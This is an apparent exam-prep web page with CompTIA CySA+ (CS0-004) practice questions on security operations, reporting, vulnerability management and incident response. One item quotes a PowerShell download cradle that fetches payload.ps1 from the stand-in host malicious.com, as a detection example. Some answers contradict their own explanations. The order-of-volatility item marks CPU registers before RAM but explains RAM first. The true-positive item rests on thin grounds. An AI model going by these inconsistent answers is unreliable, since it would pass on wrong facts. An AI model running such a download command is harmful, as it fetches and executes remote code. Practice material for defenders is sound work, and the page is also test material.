CompTIA · Free Practice Questions · Last reviewed May 2026
24real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right — and why the others are wrong.
33% of exam · 6 sample questions below
A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?
False positive
False negative
True negative
True positive
A true positive occurs when a security monitoring tool correctly identifies and alerts on actual malicious or unauthorized activity. In this case, the SIEM alert successfully flagged a genuine security event that requires analyst triage and incident response. Validating true positives is a fundamental step in the incident handling lifecycle before escalating to containment.
During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?
HTTP smuggling
TCP handshake anomaly
DNS tunneling
DNS tunneling encapsulates non-DNS traffic, such as SSH, HTTP, or proprietary data exfiltration protocols, within DNS queries and responses. While standard DNS queries typically utilize UDP port 53, attackers frequently fall back to or abuse TCP port 53 to bypass standard UDP-based inspection filters and transmit larger payloads or maintain persistent, stateful connection channels.
Beaconing
An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
PowerShell download cradle
The EDR alert describes a PowerShell download cradle, a classic Living off the Land (LotL) technique where command-line utilities like Invoke-WebRequest or Net.WebClient are abused to fetch and execute malicious code. Security analysts frequently flag these patterns because they bypass traditional file-based detection mechanisms by leveraging trusted system binaries to download payloads directly into memory or disk.
WMI persistence
Scheduled task creation
DLL side-loading
A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?
Schedule an immediate emergency patch
Remove the WAF to ensure the vulnerability is addressed
Document the compensating control and reduce the risk rating
Proper risk management requires documenting the active compensating control, such as a WAF rule blocking the specific exploit vector, within the risk register. Because this control significantly reduces the likelihood of successful exploitation, the risk rating should be adjusted downward to reflect the actual residual risk. This ensures accurate reporting and prioritization for the security team.
Ignore the finding because it is a false positive
A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?
Add the scanner's IP to an allowlist in the rule
Adding the authorized scanner's IP address to an exclusion or allowlist within the specific detection rule suppresses benign alerts generated by scheduled vulnerability assessments. This targeted tuning preserves the rule's efficacy for detecting actual malicious activity from unauthorized sources while eliminating alert fatigue caused by known, legitimate scanning activities.
Disable the rule permanently
Report the scanner as compromised
Increase the severity of the rule
An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?
Domain generation algorithm (DGA)
Lateral movement
Data exfiltration
Data exfiltration involves the unauthorized transfer of sensitive information from an internal network to an external, attacker-controlled destination. In NetFlow analysis, this is typically flagged by an anomalous, large-volume outbound connection (north-south traffic) originating from an internal host to an unfamiliar external IP address, especially outside of normal business hours.
Normal backup activity
Want more Security Operations practice?
Practice this domain17% of exam · 6 sample questions below
A security analyst needs to communicate the business impact of a newly discovered critical vulnerability to the executive team. Which of the following is the BEST approach?
Send the raw vulnerability scan report.
Explain the vulnerability in layman's terms and estimate potential financial loss.
This is the correct approach because it strips out jargon and instead frames the exposure as a concrete estimate of financial loss, which is the currency executives use to weigh competing priorities. Plain-language framing paired with a dollar figure lets leadership approve remediation resources without needing a technical background.
Recommend immediate patching without further context.
Provide a detailed CVSS score and exploit code.
During an incident response, the SOC team identifies a data breach involving customer PII. Under GDPR, what is the maximum time frame to notify the supervisory authority?
96 hours
72 hours
72 hours is the correct timeframe under GDPR Article 33(1), which states that a data breach notification must be made to the competent supervisory authority 'without undue delay' and, where feasible, no later than 72 hours after the controller becomes aware of the breach. This period is a fixed regulatory deadline, and failure to meet it without a documented justification (e.g., complexity of investigation) can result in significant administrative fines.
24 hours
48 hours
A cybersecurity analyst is preparing a threat intelligence report for the SOC team. Which type of intelligence should be included to provide actionable indicators of compromise (IoCs)?
Tactical intelligence
Tactical threat intelligence focuses on the immediate, real-time indicators of compromise (IoCs) such as malicious IP addresses, domain names, and file hashes. Security analysts ingest this data directly into security information and event management (SIEM) systems and firewalls to automate threat detection and block active attacks.
Strategic intelligence
Technical intelligence
Operational intelligence
After a security incident, which component of the incident report provides a chronological sequence of events from detection to recovery?
Timeline
The timeline is the chronological reconstruction of every observable event leading up to, during, and after the security incident. It consolidates artifacts like log entries, file system changes, network flows, and user actions into a coherent sequence. This component is foundational because it enables analysts to map the attack lifecycle and determine the exact order of compromise, which is essential for effective containment and eradication.
Lessons learned
Root cause
Impact assessment
Which metric measures the average time it takes to identify a security incident from the moment it occurs?
MTTRem
MTTR
SLA compliance
MTTD
MTTD, Mean Time to Detect, is precisely the metric that measures the average elapsed time between when a security incident actually begins and when the security team becomes aware of it, making it the key indicator of detection capability and a primary driver of overall breach cost and dwell time.
A vulnerability report includes a risk acceptance section. Which of the following scenarios is most appropriate to include in this section?
A vulnerability that has been exploited in the wild
A critical vulnerability that has been patched
All open vulnerabilities regardless of severity
A medium-severity vulnerability with a compensating control that reduces risk to acceptable levels
This is the textbook risk acceptance scenario because the medium severity keeps residual exposure within a tolerable range, and the compensating control, such as network segmentation or restricted access, provides documented, measurable risk reduction that justifies formally accepting rather than remediating the underlying vulnerability.
Want more Reporting and Communication practice?
Practice this domain30% of exam · 6 sample questions below
A security analyst is reviewing vulnerability scan results and notices that a critical vulnerability on a web server has a CVSS v3.1 base score of 9.8 with the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which component of the CVSS vector indicates that the vulnerability can be exploited from a remote network?
PR:N
AV:N
The Attack Vector (AV) metric represents the context in which vulnerability exploitation is possible. A value of AV:N (Network) explicitly indicates that the vulnerability is exploitable remotely over the network, meaning the attacker does not need local, physical, or adjacent network access to compromise the target.
AC:L
UI:N
A security analyst is using the EPSS to prioritize vulnerabilities for remediation. EPSS is designed to estimate the likelihood that a vulnerability will be exploited in the wild. Which of the following best describes how EPSS should be used in vulnerability management?
EPSS is only relevant for high-severity vulnerabilities with a CVSS score above 9.0.
EPSS replaces the need for vulnerability scanning because it predicts exploitability.
EPSS alone should determine the remediation order, ignoring asset criticality.
EPSS should be used as one of several factors in a risk-based prioritization approach.
Modern vulnerability management relies on risk-based prioritization, which integrates threat intelligence, asset value, and vulnerability severity. EPSS provides a dynamic, data-driven estimate of exploit probability in the wild, which helps analysts filter out thousands of vulnerabilities that are unlikely to ever be leveraged. When combined with CVSS severity and internal asset criticality, EPSS enables security teams to allocate remediation resources to the highest-risk areas first.
A security team is implementing configuration management for a set of Linux servers in a non-DoD environment. They want to apply a security baseline that provides a balanced approach between security and operational efficiency. Which of the following would be most appropriate?
CIS Level 1 Benchmark
The CIS Level 1 Benchmark is designed to deliver a basic, essential security posture that can be rapidly implemented across systems with minimal disruption to business operations. It focuses on disabling unnecessary services, configuring basic logging, and enforcing standard access controls without breaking application functionality. This makes it the ideal starting point for general enterprise configuration management.
OWASP Top 10
CIS Level 2 Benchmark
STIG for Linux
A security analyst is using Burp Suite to test an API endpoint. The analyst notices that the API returns detailed error messages when invalid input is provided, revealing database schema information. Which OWASP Top 10 category does this issue primarily relate to?
Injection
Security Misconfiguration
Verbose error messages, such as stack traces or database debugging information returned by an API endpoint, represent a classic security misconfiguration. Properly configuring the application server to suppress detailed debugging outputs and return generic error messages prevents attackers from mapping the internal architecture and finding exploitable vectors.
Broken Access Control
Cryptographic Failures
A security team is scanning container images with Trivy and finds a vulnerability with CVSS v3.1 vector AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H. The vulnerability exists in a container running as a privileged container on a Kubernetes cluster. The team is prioritizing based on risk. Given the CVSS vector, which factor most significantly reduces the likelihood of exploitation in this context?
Attack Vector: Local
An Attack Vector of Local (AV:L) significantly reduces the exploitability score because the attacker cannot exploit the vulnerability over the network. They must already possess local shell access, console access, or the ability to execute code locally on the container or host, creating a major barrier to entry compared to Network-based attacks.
Privileges Required: High
Attack Complexity: High
User Interaction: None
During a configuration compliance scan using OpenSCAP, a security analyst finds that several Windows servers have the 'Network access: Do not allow anonymous enumeration of SAM accounts' setting set to 'Disabled'. This finding corresponds to a CIS Benchmark recommendation. Which of the following describes the most appropriate remediation step for this finding?
Disable the Guest account on all servers.
Apply a registry key to disable anonymous enumeration.
Restrict anonymous access using IPsec rules.
Enable the policy 'Network access: Do not allow anonymous enumeration of SAM accounts' via Group Policy.
This Group Policy setting directly addresses the OpenSCAP finding by preventing unauthenticated users from enumerating domain or local account names and shares. Enabling this policy enforces the recommended CIS benchmark control, securing the SAM database against reconnaissance techniques like null session enumeration without disrupting legitimate system operations.
Want more Vulnerability Management practice?
Practice this domain20% of exam · 6 sample questions below
During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, an analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which step should the analyst perform next to validate the alert?
Search for the IP address on VirusTotal and Shodan.
Correlate the alert with other logs and endpoint data to confirm malicious activity.
Correlating the network alert with logs and endpoint telemetry confirms whether the internal host is genuinely compromised or the traffic is benign. This validation step distinguishes true malicious activity from false positives before escalating within the detection and analysis phase.
Escalate the alert to the incident response team for containment.
Contain the host immediately by disconnecting it from the network.
An organization's security team receives an alert about a potential ransomware infection on a critical server. The severity classification is 'high' because the server supports a production database. According to the incident response plan, which containment action should be taken first to minimize data loss?
Reboot the server to clear the ransomware from memory.
Disconnect the server from the network.
Disconnecting the server from the network is the most effective immediate containment action because it halts lateral movement to other network segments and prevents the ransomware from communicating with its command-and-control (C2) server. This isolation stops the spread of the infection and prevents the exfiltration of sensitive data while preserving the system's volatile memory for subsequent forensic analysis.
Kill the ransomware process using task manager.
Create a full disk image of the server before any action.
A forensic analyst is investigating a suspected data breach involving a compromised workstation. The analyst wants to collect volatile data in accordance with the order of volatility. Which sequence of data collection is correct?
Disk → RAM → Swap → CPU registers → Network connections → Archived media
CPU registers → RAM → Swap → Network connections → Disk → Archived media
Correct: RAM (most volatile) first, then CPU registers, then swap, then network connections, then disk, then archived media. This follows the standard order of volatility.
Network connections → CPU registers → RAM → Swap → Disk → Archived media
CPU registers → RAM → Swap → Disk → Network connections → Archived media
After containing a malware outbreak, the incident response team performs static malware analysis on a suspicious executable. Which of the following artifacts would be most helpful in creating a YARA rule to detect variants of the malware?
The creation timestamp of the file
The file size of the executable
The packer used to obfuscate the executable
The import table showing API calls like WriteProcessMemory and CreateRemoteThread
Targeting specific Windows API functions within the Portable Executable (PE) import table, such as WriteProcessMemory and CreateRemoteThread, allows YARA rules to identify the underlying functional capabilities of the malware, such as process injection. Because these APIs are essential for the malware's injection mechanism, they serve as robust, behavior-based indicators that remain consistent across different compiled versions and packaging variations.
During dynamic malware analysis in a sandbox, an analyst observes that the malware attempts to connect to a remote IP address on port 443, modifies the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and drops a DLL in the system32 folder. Which type of IOC is most indicative of persistence?
The registry modification to the Run key
The HKCU\Software\Microsoft\Windows\CurrentVersion\Run key causes the referenced program to execute automatically at user logon, establishing persistence across reboots. The outbound port 443 connection indicates command-and-control, and the dropped system32 DLL is a payload artefact, but only the Run key modification ensures the malware survives restarts.
The network connection over port 443
The remote IP address
The dropped DLL file hash
An organization uses MISP as its threat intelligence platform. After a security incident, the team wants to share IOCs with other trusted organizations. Which standard should they use to package and exchange the threat intelligence?
SNMP
NetFlow
SMTP
STIX/TAXII
Structured Threat Information Expression (STIX) provides a standardized XML/JSON schema to represent cyber threat intelligence, while Trusted Automated Exchange of Intelligence Information (TAXII) is the application-layer protocol used to securely route this data. MISP natively supports STIX/TAXII to enable automated, machine-to-machine sharing of indicators of compromise (IoCs) and threat actor profiles across diverse security tools.
Want more Incident Response and Management practice?
Practice this domainThe CS0-004 exam has 85 questions and must be completed in 165 minutes. The passing score is 750/1000.
Multiple-choice and performance-based questions covering threat intelligence, vulnerability management, incident response, and security operations. Some questions are performance-based (PBQs), asking you to complete tasks in a simulated environment.
The exam covers 4 domains: Security Operations, Reporting and Communication, Vulnerability Management, Incident Response and Management. Questions are weighted by domain — higher-weight domains appear more on your actual exam.
No. These are original exam-style practice questions written against the official CompTIA CS0-004 exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.
Courseiva tracks your accuracy per domain and routes you toward weak areas automatically. Free, no account required.